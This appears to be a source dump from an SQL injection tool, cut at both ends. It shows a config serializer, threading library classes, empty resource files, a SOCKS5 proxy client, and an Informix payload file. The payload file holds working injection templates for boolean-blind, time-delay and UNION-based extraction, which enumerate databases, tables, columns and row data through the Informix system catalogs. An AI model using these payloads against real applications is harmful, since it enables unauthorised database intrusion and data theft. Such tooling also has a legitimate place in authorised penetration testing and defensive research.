50 | fStream = new FileStream(fileName, FileMode.Create, FileAccess.ReadWrite);
51 | //创建XML序列化器,需要指定对象的类型
52 | XmlSerializer xmlFormat = new XmlSerializer(obj.GetType());
53 | xmlFormat.Serialize(fStream, obj);
54 |
55 | }
56 | catch (Exception e)
57 | {
58 |
59 | throw e;
60 | }
61 | finally
62 | {
63 | if (fStream != null)
64 | {
65 | fStream.Close();
66 | }
67 |
68 | }
69 | }
70 |
71 | public static Config readConfig(String configPath)
72 | {
73 | Stream fStream = null;
74 | Config config = new Config();
75 | try
76 | {
77 | XmlSerializer xml = new XmlSerializer(typeof(Config));
78 | //创建XML序列化器,需要指定对象的类型
79 | fStream = new FileStream(configPath, FileMode.Open, FileAccess.ReadWrite);
80 | XmlTextReader reader = new XmlTextReader(fStream);
81 | reader.Normalization = false;
82 | config = (Config)xml.Deserialize(reader);
83 |
84 | }
85 | catch (Exception e)
86 | {
87 | Tools.SysLog(configPath+" 读取错误!"+e.Message);
88 | }
89 | finally {
90 | if (fStream != null) {
91 |
92 | fStream.Close();
93 | }
94 | }
95 | return config;
96 | }
97 |
98 | public static Object readObject(String configPath,Object obj)
99 | {
100 | Stream fStream = null;
101 | try
102 | {
103 | XmlSerializer xml = new XmlSerializer(obj.GetType());
104 | //创建XML序列化器,需要指定对象的类型
105 | fStream = new FileStream(configPath, FileMode.Open, FileAccess.ReadWrite);
106 | XmlTextReader reader = new XmlTextReader(fStream);
107 | reader.Normalization = false;
108 | return xml.Deserialize(reader);
109 | }
110 | catch (Exception e)
111 | {
112 | throw e;
113 | }
114 | finally
115 | {
116 | if (fStream != null)
117 | {
118 | fStream.Close();
119 | }
120 | }
121 | }
122 |
123 |
124 |
125 | public static void saveDBS(String fileName, DataBase dbs)
126 | {
127 | Stream fStream = null;
128 | try
129 | {
130 | fStream = new FileStream(fileName, FileMode.Create, FileAccess.ReadWrite);
131 | //创建XML序列化器,需要指定对象的类型
132 | XmlSerializer xmlFormat = new XmlSerializer(typeof(DataBase));
133 | xmlFormat.Serialize(fStream, dbs);
134 | }
135 | catch (Exception e)
136 | {
137 |
138 | throw e;
139 | }
140 | finally
141 | {
142 | if (fStream != null)
143 | {
144 | fStream.Close();
145 | }
146 |
147 | }
148 | }
149 |
150 | public static DataBase readDBS(String path)
151 | {
152 | Stream fStream = null;
153 | try
154 | {
155 | XmlSerializer xml = new XmlSerializer(typeof(DataBase));
156 | //创建XML序列化器,需要指定对象的类型
157 | fStream = new FileStream(path, FileMode.Open, FileAccess.ReadWrite);
158 | XmlTextReader reader = new XmlTextReader(fStream);
159 | reader.Normalization = false;
160 | DataBase config = (DataBase)xml.Deserialize(reader);
161 | return config;
162 | }
163 | catch (Exception e)
164 | {
165 |
166 | throw e;
167 | }
168 | finally
169 | {
170 | if (fStream != null)
171 | {
172 |
173 | fStream.Close();
174 | }
175 | }
176 | }
177 | }
178 | }
179 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/smartthread/WIGStartInfo.cs:
--------------------------------------------------------------------------------
1 | using System;
2 |
3 | namespace Amib.Threading
4 | {
5 | ///
6 | /// Summary description for WIGStartInfo.
7 | ///
8 | public class WIGStartInfo
9 | {
10 | private bool _useCallerCallContext;
11 | private bool _useCallerHttpContext;
12 | private bool _disposeOfStateObjects;
13 | private CallToPostExecute _callToPostExecute;
14 | private PostExecuteWorkItemCallback _postExecuteWorkItemCallback;
15 | private bool _startSuspended;
16 | private WorkItemPriority _workItemPriority;
17 | private bool _fillStateWithArgs;
18 |
19 | protected bool _readOnly;
20 |
21 | public WIGStartInfo()
22 | {
23 | _fillStateWithArgs = SmartThreadPool.DefaultFillStateWithArgs;
24 | _workItemPriority = SmartThreadPool.DefaultWorkItemPriority;
25 | _startSuspended = SmartThreadPool.DefaultStartSuspended;
26 | _postExecuteWorkItemCallback = SmartThreadPool.DefaultPostExecuteWorkItemCallback;
27 | _callToPostExecute = SmartThreadPool.DefaultCallToPostExecute;
28 | _disposeOfStateObjects = SmartThreadPool.DefaultDisposeOfStateObjects;
29 | _useCallerHttpContext = SmartThreadPool.DefaultUseCallerHttpContext;
30 | _useCallerCallContext = SmartThreadPool.DefaultUseCallerCallContext;
31 | }
32 |
33 | public WIGStartInfo(WIGStartInfo wigStartInfo)
34 | {
35 | _useCallerCallContext = wigStartInfo.UseCallerCallContext;
36 | _useCallerHttpContext = wigStartInfo.UseCallerHttpContext;
37 | _disposeOfStateObjects = wigStartInfo.DisposeOfStateObjects;
38 | _callToPostExecute = wigStartInfo.CallToPostExecute;
39 | _postExecuteWorkItemCallback = wigStartInfo.PostExecuteWorkItemCallback;
40 | _workItemPriority = wigStartInfo.WorkItemPriority;
41 | _startSuspended = wigStartInfo.StartSuspended;
42 | _fillStateWithArgs = wigStartInfo.FillStateWithArgs;
43 | }
44 |
45 | protected void ThrowIfReadOnly()
46 | {
47 | if (_readOnly)
48 | {
49 | throw new NotSupportedException("This is a readonly instance and set is not supported");
50 | }
51 | }
52 |
53 | ///
54 | /// Get/Set if to use the caller's security context
55 | ///
56 | public virtual bool UseCallerCallContext
57 | {
58 | get { return _useCallerCallContext; }
59 | set
60 | {
61 | ThrowIfReadOnly();
62 | _useCallerCallContext = value;
63 | }
64 | }
65 |
66 |
67 | ///
68 | /// Get/Set if to use the caller's HTTP context
69 | ///
70 | public virtual bool UseCallerHttpContext
71 | {
72 | get { return _useCallerHttpContext; }
73 | set
74 | {
75 | ThrowIfReadOnly();
76 | _useCallerHttpContext = value;
77 | }
78 | }
79 |
80 |
81 | ///
82 | /// Get/Set if to dispose of the state object of a work item
83 | ///
84 | public virtual bool DisposeOfStateObjects
85 | {
86 | get { return _disposeOfStateObjects; }
87 | set
88 | {
89 | ThrowIfReadOnly();
90 | _disposeOfStateObjects = value;
91 | }
92 | }
93 |
94 |
95 | ///
96 | /// Get/Set the run the post execute options
97 | ///
98 | public virtual CallToPostExecute CallToPostExecute
99 | {
100 | get { return _callToPostExecute; }
101 | set
102 | {
103 | ThrowIfReadOnly();
104 | _callToPostExecute = value;
105 | }
106 | }
107 |
108 |
109 | ///
110 | /// Get/Set the default post execute callback
111 | ///
112 | public virtual PostExecuteWorkItemCallback PostExecuteWorkItemCallback
113 | {
114 | get { return _postExecuteWorkItemCallback; }
115 | set
116 | {
117 | ThrowIfReadOnly();
118 | _postExecuteWorkItemCallback = value;
119 | }
120 | }
121 |
122 |
123 | ///
124 | /// Get/Set if the work items execution should be suspended until the Start()
125 | /// method is called.
126 | ///
127 | public virtual bool StartSuspended
128 | {
129 | get { return _startSuspended; }
130 | set
131 | {
132 | ThrowIfReadOnly();
133 | _startSuspended = value;
134 | }
135 | }
136 |
137 |
138 | ///
139 | /// Get/Set the default priority that a work item gets when it is enqueued
140 | ///
141 | public virtual WorkItemPriority WorkItemPriority
142 | {
143 | get { return _workItemPriority; }
144 | set { _workItemPriority = value; }
145 | }
146 |
147 | ///
148 | /// Get/Set the if QueueWorkItem of Action<...>/Func<...> fill the
149 | /// arguments as an object array into the state of the work item.
150 | /// The arguments can be access later by IWorkItemResult.State.
151 | ///
152 | public virtual bool FillStateWithArgs
153 | {
154 | get { return _fillStateWithArgs; }
155 | set
156 | {
157 | ThrowIfReadOnly();
158 | _fillStateWithArgs = value;
159 | }
160 | }
161 |
162 | ///
163 | /// Get a readonly version of this WIGStartInfo
164 | ///
165 | /// Returns a readonly reference to this WIGStartInfoRO
166 | public WIGStartInfo AsReadOnly()
167 | {
168 | return new WIGStartInfo(this) { _readOnly = true };
169 | }
170 | }
171 | }
172 |
--------------------------------------------------------------------------------
/SuperSQLInjection/AddNode.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
--------------------------------------------------------------------------------
/SuperSQLInjection/Seting.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
--------------------------------------------------------------------------------
/SuperSQLInjection/Waring.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
--------------------------------------------------------------------------------
/SuperSQLInjection/FindString.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
--------------------------------------------------------------------------------
/SuperSQLInjection/ShowResponse.resx:
--------------------------------------------------------------------------------
1 |
2 |
3 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
85 |
86 |
87 |
88 |
89 |
90 |
91 |
92 |
93 |
94 |
95 |
96 |
97 |
98 |
99 |
100 |
101 |
102 |
103 |
104 |
105 |
106 |
107 |
108 |
109 | text/microsoft-resx
110 |
111 |
112 | 2.0
113 |
114 |
115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
116 |
117 |
118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
119 |
120 |
--------------------------------------------------------------------------------
/SuperSQLInjection/payload/Informix.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 | using tools;
5 |
6 | namespace SuperSQLInjection.payload
7 | {
8 | class Informix
9 | {
10 | //加载对应配置(需要读取的环境变量)
11 | public static String path = "config/vers/informix.txt";
12 | public static List vers = FileTool.readFileToList(path);
13 |
14 | //数据库数量
15 | public static String dbs_count = "(select count(*) from sysmaster:sysdatabases)";
16 | //表数量
17 | public static String tables_count = "(select count(*) from {dbname}:systables where tabtype='T' and tabid>99)";
18 | //列数量
19 | public static String columns_count = "(select count(*) from {dbname}:systables t,{dbname}:syscolumns c where t.tabid=c.tabid and t.tabname='{table}')";
20 |
21 |
22 | //获取数据库名
23 | public static String db_value = "(select name from (select skip {index} first 1 name from sysmaster:sysdatabases))";
24 | //获取表名称
25 | public static String table_value = "(select tabname from (select skip {index} first 1 tabname from {dbname}:systables where tabtype='T' and tabid>99))";
26 | //获取列名称
27 | public static String column_value = "(select colname from (select skip {index} first 1 colname from {dbname}:systables t,{dbname}:syscolumns c where t.tabid=c.tabid and t.tabname='{table}'))";
28 |
29 |
30 | //获取数据库数量bool方式
31 | public static String bool_db_count = " " + dbs_count + ">{len}";
32 | //获取表数量bool
33 | public static String bool_tables_count = " " + tables_count + ">{len}";
34 | //获取列数量bool
35 | public static String bool_columns_count = " " + columns_count + ">{len}";
36 |
37 |
38 |
39 | public static String substr = "substr(({data})),{index},1)";
40 | //多字节
41 | //public static String hex_value = "ascii({data})";
42 |
43 | //bool方式字符长度判断
44 | public static String bool_length = " length(({data}))>{len}";
45 |
46 | //bool方式获取值
47 | public static String bool_value = " ascii(substr({data},{index},1))>{len}";
48 | //最大32767
49 | public static String cast_value = "rtrim(cast({data} as char(32767)))";
50 | public static String no_cast_value = "({data})";
51 |
52 | //获取行数据
53 | public static String data_value = "(select "+ cast_value + " from (select skip {index} first 1 {allcolumns} from {dbname}:{table}))";
54 |
55 | //获取行数据
56 | public static String data_no_cast_value = "(select {data} from (select skip {index} first 1 {allcolumns} from {dbname}:{table}))";
57 |
58 |
59 | //union获取数据条数
60 | public static String data_count = "(select count(*) from {dbname}:{table})";
61 |
62 | public static String bool_datas_count = " " + data_count + ">={len}";
63 |
64 | //union获取值
65 | public static String union_value = " 1=2 union all select {data} from sysmaster:sysdual";
66 |
67 |
68 | public static String rand = Tools.RandNum(3);
69 |
70 | public static String start = rand + 0;
71 | public static String mid = rand + 5;
72 | public static String end = rand + 9;
73 |
74 |
75 | public static String getBoolDataBySleep(String data)
76 | {
77 | return " 1=(case when(" + data + ") then (select 1 from(select count(*) from sysmaster:syspaghdr)) else 1 end)";
78 | }
79 |
80 | public static String getBoolCountBySleep(String data)
81 | {
82 | return " 1=(case when(" + data + ") then (select 1 from(select count(*) from sysmaster:syspaghdr)) else 1 end)";
83 | }
84 |
85 | public static String getUnionDataValue(String unionFileTemplate, String dataPayLoad, String dbname, String table, String index,String castStr)
86 | {
87 | String temlate=unionFileTemplate.Replace("{data}", "(to_char("+start+ ")||to_char(" + start + ")||" + castStr.Replace("{data}", dataPayLoad.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index)) + "||to_char(" + end + ")||to_char(" + end + "))");
88 | return union_value.Replace("{data}", temlate);
89 | }
90 |
91 | public static String unionColumns(List columns, String unionStr)
92 | {
93 | StringBuilder sb = new StringBuilder();
94 | decimal c = 32000 / columns.Count;
95 | int max = (int)Math.Ceiling(c);
96 |
97 | foreach (String column in columns)
98 | {
99 | sb.Append(cast_value.Replace("32767", max.ToString()).Replace("{data}", column) + unionStr);
100 | }
101 | sb.Remove(sb.Length - unionStr.Length, unionStr.Length);
102 | return sb.ToString();
103 | }
104 |
105 | public static String getUnionDataValue(String unionFileTemplate, List columns, String dbname, String table, String index)
106 | {
107 | String data = "to_char(" + start + ")||to_char(" + start + ")||" + unionColumns(columns,"||to_char("+ mid + ")||") + "||to_char(" + end + ")||to_char(" + end + ")";
108 | String template= unionFileTemplate.Replace("{data}", (data_no_cast_value.Replace("{data}", data).Replace("{allcolumns}", Comm.unionColumns(columns, ",")).Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index)));
109 | return union_value.Replace("{data}", template);
110 | }
111 |
112 | ///
113 | /// 获得bool方式值payload
114 | ///
115 | /// 对应值的查询SQL
116 | /// 数据库名
117 | /// 表名
118 | /// 下标
119 | ///
120 | public static String getBoolDataPayLoad(String column, String dbName, String table, int index)
121 | {
122 | String payload = data_value.Replace("{data}", column).Replace("{allcolumns}", column).Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index.ToString());
123 | return payload;
124 | }
125 | }
126 | }
127 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/http/SocketProxy.cs:
--------------------------------------------------------------------------------
1 | using Amib.Threading.Internal;
2 | using System;
3 | using System.Collections.Generic;
4 | using System.Linq;
5 | using System.Net;
6 | using System.Net.Sockets;
7 | using System.Text;
8 | using tools;
9 |
10 | namespace SuperSQLInjection.tools.http
11 | {
12 | class SocketProxy
13 | {
14 |
15 | private static byte[] s5_hello = new Byte[] { 5, 1, 0 };
16 | public int CreatProxyUseTime = 0;
17 | public int ConectProxyUseTime = 0;
18 | private Stopwatch sw = new Stopwatch();
19 | public TcpClient creatProxySocket(string host, int port,int timeout) {
20 | try
21 | {
22 | TimeOutSocket ts = new TimeOutSocket();
23 | TcpClient cilent=ts.Connect(host, port, timeout);
24 | TcpClient client = new TcpClient();
25 | client.Connect(host, port);
26 | CreatProxyUseTime = ts.useTime;
27 | if (client.Connected)
28 | {
29 | return client;
30 | }
31 | else {
32 | client.Close();
33 | }
34 |
35 | }
36 | catch (Exception e) {
37 | Tools.SysLog("creatProxySocket异常:" + e.Message);
38 | }
39 | return null;
40 | }
41 |
42 | public byte[] GetLoginByte(String username,String password) {
43 |
44 | byte[] bUser = Encoding.Default.GetBytes(username);
45 | byte[] bPass = Encoding.Default.GetBytes(password);
46 |
47 | int len = 3 + bUser.Length + bPass.Length;
48 |
49 | byte[] data = new Byte[len];
50 | data[0] = 5;
51 | data[1] = (byte)bUser.Length;
52 | Array.Copy(bUser, 0, data, 2, bUser.Length);
53 | data[2 + bUser.Length] = (byte)bPass.Length;
54 | Array.Copy(bPass, 0, data, 3 + bUser.Length, bPass.Length);
55 | return data;
56 | }
57 |
58 | public byte[] GetConectTargetByte(String hsot, int port)
59 | {
60 | byte[] data = new byte[10];
61 | data[0] = 5;
62 | data[1] = 1;
63 | data[2] = 0;
64 | data[3] = 1;
65 |
66 | IPAddress ipAdd = Dns.GetHostAddresses(hsot)[0];
67 | string strIp = ipAdd.ToString();
68 | string[] strAryTemp = strIp.Split(new char[] { '.' });
69 | data[4] = Convert.ToByte(strAryTemp[0]);
70 | data[5] = Convert.ToByte(strAryTemp[1]);
71 | data[6] = Convert.ToByte(strAryTemp[2]);
72 | data[7] = Convert.ToByte(strAryTemp[3]);
73 |
74 | data[8] = (byte)(port / 256);
75 | data[9] = (byte)(port % 256);
76 | return data;
77 | }
78 |
79 | ///
80 | /// 测试连接代理服务器
81 | ///
82 | ///
83 | ///
84 | ///
85 | ///
86 | public bool ConnectProxyServer(string host, int port, TcpClient sProxyServer,String username,String password,int timeout)
87 | {
88 | try
89 | {
90 | sw.Start();
91 | //构造Socks5代理服务器第一连接头(无用户名密码)
92 | byte[] bySock5Receive = new byte[10];
93 | int readCount = 0;
94 | sProxyServer.ReceiveTimeout = (timeout * 1000) - CreatProxyUseTime;
95 | if (String.IsNullOrEmpty(username) && String.IsNullOrEmpty(password))
96 | {
97 | sProxyServer.Client.Send(s5_hello, s5_hello.Length, SocketFlags.None);
98 | }
99 | else
100 | {
101 | byte[] login = GetLoginByte(username, password);
102 | sProxyServer.Client.Send(login, login.Length, SocketFlags.None);
103 | }
104 | readCount = sProxyServer.Client.Receive(bySock5Receive, bySock5Receive.Length, SocketFlags.None);
105 | if (readCount < 2)
106 | {
107 | throw new Exception("不能获得代理服务器正确响应。");
108 | }
109 |
110 | else if (bySock5Receive[0] != 5 || (bySock5Receive[1] != 0 && bySock5Receive[1] != 2))
111 | {
112 | throw new Exception("代理服务其返回的响应错误。");
113 | }
114 | else
115 | {
116 | //用户验证
117 | if (bySock5Receive[1] == 2)
118 | {
119 | if (String.IsNullOrEmpty(username) && String.IsNullOrEmpty(password))
120 | {
121 | throw new Exception("代理服务器需要进行身份确认,您未设置代理账号和密码。");
122 | }
123 | }
124 |
125 | if (bySock5Receive[1] == 0)
126 | {
127 | byte[] data = GetConectTargetByte(host, port);
128 | sProxyServer.Client.Send(data, data.Length, SocketFlags.None);
129 | byte[] readData = new byte[100];
130 | readCount = sProxyServer.Client.Receive(readData, readData.Length, SocketFlags.None);
131 |
132 | if (readCount >= 2 && bySock5Receive[0] == 5 && bySock5Receive[1] == 0)
133 | {
134 | return true;
135 | }
136 | else
137 | {
138 | //利用Socks5代理连接目标出错。
139 | return false;
140 | }
141 | }
142 |
143 | }
144 | }
145 | catch (Exception e)
146 | {
147 | Tools.SysLog("Socks5代理发生异常!" + e.Message);
148 | }
149 | finally {
150 | sw.Stop();
151 | ConectProxyUseTime = (int)sw.ElapsedMilliseconds;
152 | sw.Reset();
153 | }
154 | return false;
155 | }
156 | }
157 | }
158 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/smartthread/PriorityQueue.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections;
3 | using System.Collections.Generic;
4 | using System.Diagnostics;
5 |
6 | namespace Amib.Threading.Internal
7 | {
8 | #region PriorityQueue class
9 |
10 | ///
11 | /// PriorityQueue class
12 | /// This class is not thread safe because we use external lock
13 | ///
14 | public sealed class PriorityQueue : IEnumerable
15 | {
16 | #region Private members
17 |
18 | ///
19 | /// The number of queues, there is one for each type of priority
20 | ///
21 | private const int _queuesCount = WorkItemPriority.Highest-WorkItemPriority.Lowest+1;
22 |
23 | ///
24 | /// Work items queues. There is one for each type of priority
25 | ///
26 | private readonly LinkedList[] _queues = new LinkedList[_queuesCount];
27 |
28 | ///
29 | /// The total number of work items within the queues
30 | ///
31 | private int _workItemsCount;
32 |
33 | ///
34 | /// Use with IEnumerable interface
35 | ///
36 | private int _version;
37 |
38 | #endregion
39 |
40 | #region Contructor
41 |
42 | public PriorityQueue()
43 | {
44 | for(int i = 0; i < _queues.Length; ++i)
45 | {
46 | _queues[i] = new LinkedList();
47 | }
48 | }
49 |
50 | #endregion
51 |
52 | #region Methods
53 |
54 | ///
55 | /// Enqueue a work item.
56 | ///
57 | /// A work item
58 | public void Enqueue(IHasWorkItemPriority workItem)
59 | {
60 | Debug.Assert(null != workItem);
61 |
62 | int queueIndex = _queuesCount-(int)workItem.WorkItemPriority-1;
63 | Debug.Assert(queueIndex >= 0);
64 | Debug.Assert(queueIndex < _queuesCount);
65 |
66 | _queues[queueIndex].AddLast(workItem);
67 | ++_workItemsCount;
68 | ++_version;
69 | }
70 |
71 | ///
72 | /// Dequeque a work item.
73 | ///
74 | /// Returns the next work item
75 | public IHasWorkItemPriority Dequeue()
76 | {
77 | IHasWorkItemPriority workItem = null;
78 |
79 | if(_workItemsCount > 0)
80 | {
81 | int queueIndex = GetNextNonEmptyQueue(-1);
82 | Debug.Assert(queueIndex >= 0);
83 | workItem = _queues[queueIndex].First.Value;
84 | _queues[queueIndex].RemoveFirst();
85 | Debug.Assert(null != workItem);
86 | --_workItemsCount;
87 | ++_version;
88 | }
89 |
90 | return workItem;
91 | }
92 |
93 | ///
94 | /// Find the next non empty queue starting at queue queueIndex+1
95 | ///
96 | /// The index-1 to start from
97 | ///
98 | /// The index of the next non empty queue or -1 if all the queues are empty
99 | ///
100 | private int GetNextNonEmptyQueue(int queueIndex)
101 | {
102 | for(int i = queueIndex+1; i < _queuesCount; ++i)
103 | {
104 | if(_queues[i].Count > 0)
105 | {
106 | return i;
107 | }
108 | }
109 | return -1;
110 | }
111 |
112 | ///
113 | /// The number of work items
114 | ///
115 | public int Count
116 | {
117 | get
118 | {
119 | return _workItemsCount;
120 | }
121 | }
122 |
123 | ///
124 | /// Clear all the work items
125 | ///
126 | public void Clear()
127 | {
128 | if (_workItemsCount > 0)
129 | {
130 | foreach(LinkedList queue in _queues)
131 | {
132 | queue.Clear();
133 | }
134 | _workItemsCount = 0;
135 | ++_version;
136 | }
137 | }
138 |
139 | #endregion
140 |
141 | #region IEnumerable Members
142 |
143 | ///
144 | /// Returns an enumerator to iterate over the work items
145 | ///
146 | /// Returns an enumerator
147 | public IEnumerator GetEnumerator()
148 | {
149 | return new PriorityQueueEnumerator(this);
150 | }
151 |
152 | #endregion
153 |
154 | #region PriorityQueueEnumerator
155 |
156 | ///
157 | /// The class the implements the enumerator
158 | ///
159 | private class PriorityQueueEnumerator : IEnumerator
160 | {
161 | private readonly PriorityQueue _priorityQueue;
162 | private int _version;
163 | private int _queueIndex;
164 | private IEnumerator _enumerator;
165 |
166 | public PriorityQueueEnumerator(PriorityQueue priorityQueue)
167 | {
168 | _priorityQueue = priorityQueue;
169 | _version = _priorityQueue._version;
170 | _queueIndex = _priorityQueue.GetNextNonEmptyQueue(-1);
171 | if (_queueIndex >= 0)
172 | {
173 | _enumerator = _priorityQueue._queues[_queueIndex].GetEnumerator();
174 | }
175 | else
176 | {
177 | _enumerator = null;
178 | }
179 | }
180 |
181 | #region IEnumerator Members
182 |
183 | public void Reset()
184 | {
185 | _version = _priorityQueue._version;
186 | _queueIndex = _priorityQueue.GetNextNonEmptyQueue(-1);
187 | if (_queueIndex >= 0)
188 | {
189 | _enumerator = _priorityQueue._queues[_queueIndex].GetEnumerator();
190 | }
191 | else
192 | {
193 | _enumerator = null;
194 | }
195 | }
196 |
197 | public object Current
198 | {
199 | get
200 | {
201 | Debug.Assert(null != _enumerator);
202 | return _enumerator.Current;
203 | }
204 | }
205 |
206 | public bool MoveNext()
207 | {
208 | if (null == _enumerator)
209 | {
210 | return false;
211 | }
212 |
213 | if(_version != _priorityQueue._version)
214 | {
215 | throw new InvalidOperationException("The collection has been modified");
216 |
217 | }
218 | if (!_enumerator.MoveNext())
219 | {
220 | _queueIndex = _priorityQueue.GetNextNonEmptyQueue(_queueIndex);
221 | if(-1 == _queueIndex)
222 | {
223 | return false;
224 | }
225 | _enumerator = _priorityQueue._queues[_queueIndex].GetEnumerator();
226 | _enumerator.MoveNext();
227 | return true;
228 | }
229 | return true;
230 | }
231 |
232 | #endregion
233 | }
234 |
235 | #endregion
236 | }
237 |
238 | #endregion
239 | }
240 |
--------------------------------------------------------------------------------
/SuperSQLInjection/tools/smartthread/WorkItem.WorkItemResult.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Collections.Generic;
3 | using System.Text;
4 | using System.Threading;
5 |
6 | namespace Amib.Threading.Internal
7 | {
8 | public partial class WorkItem
9 | {
10 | #region WorkItemResult class
11 |
12 | private class WorkItemResult : IWorkItemResult, IInternalWorkItemResult, IInternalWaitableResult
13 | {
14 | ///
15 | /// A back reference to the work item
16 | ///
17 | private readonly WorkItem _workItem;
18 |
19 | public WorkItemResult(WorkItem workItem)
20 | {
21 | _workItem = workItem;
22 | }
23 |
24 | internal WorkItem GetWorkItem()
25 | {
26 | return _workItem;
27 | }
28 |
29 | #region IWorkItemResult Members
30 |
31 | public bool IsCompleted
32 | {
33 | get
34 | {
35 | return _workItem.IsCompleted;
36 | }
37 | }
38 |
39 | public bool IsCanceled
40 | {
41 | get
42 | {
43 | return _workItem.IsCanceled;
44 | }
45 | }
46 |
47 | public object GetResult()
48 | {
49 | return _workItem.GetResult(Timeout.Infinite, true, null);
50 | }
51 |
52 | public object GetResult(int millisecondsTimeout, bool exitContext)
53 | {
54 | return _workItem.GetResult(millisecondsTimeout, exitContext, null);
55 | }
56 |
57 | public object GetResult(TimeSpan timeout, bool exitContext)
58 | {
59 | return _workItem.GetResult((int)timeout.TotalMilliseconds, exitContext, null);
60 | }
61 |
62 | public object GetResult(int millisecondsTimeout, bool exitContext, WaitHandle cancelWaitHandle)
63 | {
64 | return _workItem.GetResult(millisecondsTimeout, exitContext, cancelWaitHandle);
65 | }
66 |
67 | public object GetResult(TimeSpan timeout, bool exitContext, WaitHandle cancelWaitHandle)
68 | {
69 | return _workItem.GetResult((int)timeout.TotalMilliseconds, exitContext, cancelWaitHandle);
70 | }
71 |
72 | public object GetResult(out Exception e)
73 | {
74 | return _workItem.GetResult(Timeout.Infinite, true, null, out e);
75 | }
76 |
77 | public object GetResult(int millisecondsTimeout, bool exitContext, out Exception e)
78 | {
79 | return _workItem.GetResult(millisecondsTimeout, exitContext, null, out e);
80 | }
81 |
82 | public object GetResult(TimeSpan timeout, bool exitContext, out Exception e)
83 | {
84 | return _workItem.GetResult((int)timeout.TotalMilliseconds, exitContext, null, out e);
85 | }
86 |
87 | public object GetResult(int millisecondsTimeout, bool exitContext, WaitHandle cancelWaitHandle, out Exception e)
88 | {
89 | return _workItem.GetResult(millisecondsTimeout, exitContext, cancelWaitHandle, out e);
90 | }
91 |
92 | public object GetResult(TimeSpan timeout, bool exitContext, WaitHandle cancelWaitHandle, out Exception e)
93 | {
94 | return _workItem.GetResult((int)timeout.TotalMilliseconds, exitContext, cancelWaitHandle, out e);
95 | }
96 |
97 | public bool Cancel()
98 | {
99 | return Cancel(false);
100 | }
101 |
102 | public bool Cancel(bool abortExecution)
103 | {
104 | return _workItem.Cancel(abortExecution);
105 | }
106 |
107 | public object State
108 | {
109 | get
110 | {
111 | return _workItem._state;
112 | }
113 | }
114 |
115 | public WorkItemPriority WorkItemPriority
116 | {
117 | get
118 | {
119 | return _workItem._workItemInfo.WorkItemPriority;
120 | }
121 | }
122 |
123 | ///
124 | /// Return the result, same as GetResult()
125 | ///
126 | public object Result
127 | {
128 | get { return GetResult(); }
129 | }
130 |
131 | ///
